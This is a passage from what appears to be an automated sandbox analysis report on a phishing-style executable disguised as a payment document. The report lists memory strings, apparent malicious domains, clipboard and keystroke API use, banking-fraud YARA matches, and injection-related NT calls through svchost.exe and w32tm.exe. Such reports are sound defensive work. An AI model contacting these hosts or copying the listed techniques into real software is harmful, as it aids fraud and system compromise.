6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 13 Jan 2025 09:22:27 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
                Source: vtTdsKSTqQr.exe, 00000007.00000002.4154787819.0000000004E8C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.u75lmwdgp0du.homes
                Source: vtTdsKSTqQr.exe, 00000007.00000002.4154787819.0000000004E8C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.u75lmwdgp0du.homes/8m3y/
                Source: w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: w32tm.exe, 00000003.00000002.4153951411.0000000004DF2000.00000004.10000000.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.0000000003892000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
                Source: w32tm.exe, 00000003.00000002.4152385313.0000000003346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: w32tm.exe, 00000003.00000002.4152385313.0000000003346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: w32tm.exe, 00000003.00000002.4152385313.0000000003346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: w32tm.exe, 00000003.00000002.4152385313.000000000331F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033i
                Source: w32tm.exe, 00000003.00000002.4152385313.0000000003346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: w32tm.exe, 00000003.00000002.4152385313.000000000331F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: w32tm.exe, 00000003.00000003.2131601849.00000000081B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: w32tm.exe, 00000003.00000002.4153951411.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.000000000324A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ogbos88vip.click
                Source: w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: w32tm.exe, 00000003.00000002.4153951411.00000000052A8000.00000004.10000000.00040000.00000000.sdmp, w32tm.exe, 00000003.00000002.4155777981.0000000006790000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153951411.0000000004486000.00000004.10000000.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.0000000002F26000.00000004.00000001.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.0000000003D48000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253315519.00000000407D6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: w32tm.exe, 00000003.00000002.4153951411.0000000004ACE000.00000004.10000000.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.000000000356E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.myfastuploader.sbs/y3ui/?idTDev6P=D47F9HanQoviz063Kla
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0095EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0095EAFF
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0095ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0095ED6A
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0095EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0095EAFF
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_0094AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0094AA57
                Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeCode function: 0_2_00979576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00979576

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1892529323.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4152321363.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4152036800.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4153003564.00000000034F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1892185335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4153026334.0000000003BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1893024152.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, 00000000.00000000.1693330333.00000000009A2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b93eb65e-2
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, 00000000.00000000.1693330333.00000000009A2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_be247a93-b
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c9961171-c
                Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_cc2d9611-8
                Source: initial sampleStatic PE information: Filename: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe
                Source: initial sampleStatic PE information: Filename: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042CCE3 NtClose,1_2_0042CCE3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036735C0 NtCreateMutant,LdrInitializeThunk,1_2_036735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672B60 NtClose,LdrInitializeThunk,1_2_03672B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03672DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03674340 NtSetContextThread,1_2_03674340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673010 NtOpenDirectoryObject,1_2_03673010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673090 NtSetValueKey,1_2_03673090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03674650 NtSuspendThread,1_2_03674650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BE0 NtQueryValueKey,1_2_03672BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BF0 NtAllocateVirtualMemory,1_2_03672BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BA0 NtEnumerateValueKey,1_2_03672BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672B80 NtQueryInformationFile,1_2_03672B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AF0 NtWriteFile,1_2_03672AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AD0 NtReadFile,1_2_03672AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AB0 NtWaitForSingleObject,1_2_03672AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036739B0 NtGetContextThread,1_2_036739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F60 NtCreateProcessEx,1_2_03672F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F30 NtCreateSection,1_2_03672F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FE0 NtCreateFile,1_2_03672FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FA0 NtQuerySection,1_2_03672FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FB0 NtResumeThread,1_2_03672FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F90 NtProtectVirtualMemory,1_2_03672F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672E30 NtWriteVirtualMemory,1_2_03672E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672EE0 NtQueueApcThread,1_2_03672EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672EA0 NtAdjustPrivilegesToken,1_2_03672EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672E80 NtReadVirtualMemory,1_2_03672E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673D70 NtOpenThread,1_2_03673D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D30 NtUnmapViewOfSection,1_2_03672D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D00 NtSetInformationFile,1_2_03672D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D10 NtMapViewOfSection,1_2_03672D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673D10 NtOpenProcessToken,1_2_03673D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DD0 NtDelayExecution,1_2_03672DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DB0 NtEnumerateKey,1_2_03672DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C60 NtCreateKey,1_2_03672C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C70 NtFreeVirtualMemory,1_2_03672C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C00 NtQueryInformationProcess,1_2_03672C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CF0 NtOpenProcess,1_2_03672CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CC0 NtQueryVirtualMemory,1_2_03672CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CA0 NtQueryInformationToken,1_2_03672CA0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03954340 NtSetContextThread,LdrInitializeThunk,3_2_03954340
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03954650 NtSuspendThread,LdrInitializeThunk,3_2_03954650
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_03952BA0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_03952BF0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952BE0 NtQueryValueKey,LdrInitializeThunk,3_2_03952BE0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952B60 NtClose,LdrInitializeThunk,3_2_03952B60
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952AD0 NtReadFile,LdrInitializeThunk,3_2_03952AD0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952AF0 NtWriteFile,LdrInitializeThunk,3_2_03952AF0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952FB0 NtResumeThread,LdrInitializeThunk,3_2_03952FB0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952FE0 NtCreateFile,LdrInitializeThunk,3_2_03952FE0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952F30 NtCreateSection,LdrInitializeThunk,3_2_03952F30
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_03952E80
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952EE0 NtQueueApcThread,LdrInitializeThunk,3_2_03952EE0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952DD0 NtDelayExecution,LdrInitializeThunk,3_2_03952DD0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_03952DF0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952D10 NtMapViewOfSection,LdrInitializeThunk,3_2_03952D10
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_03952D30
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_03952CA0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_03952C70
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952C60 NtCreateKey,LdrInitializeThunk,3_2_03952C60
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039535C0 NtCreateMutant,LdrInitializeThunk,3_2_039535C0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_039539B0 NtGetContextThread,LdrInitializeThunk,3_2_039539B0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952B80 NtQueryInformationFile,3_2_03952B80
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952AB0 NtWaitForSingleObject,3_2_03952AB0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952F90 NtProtectVirtualMemory,3_2_03952F90
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952FA0 NtQuerySection,3_2_03952FA0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952F60 NtCreateProcessEx,3_2_03952F60
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952EA0 NtAdjustPrivilegesToken,3_2_03952EA0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 3_2_03952E30 NtWriteVirtualMemory,3_2_03952E30
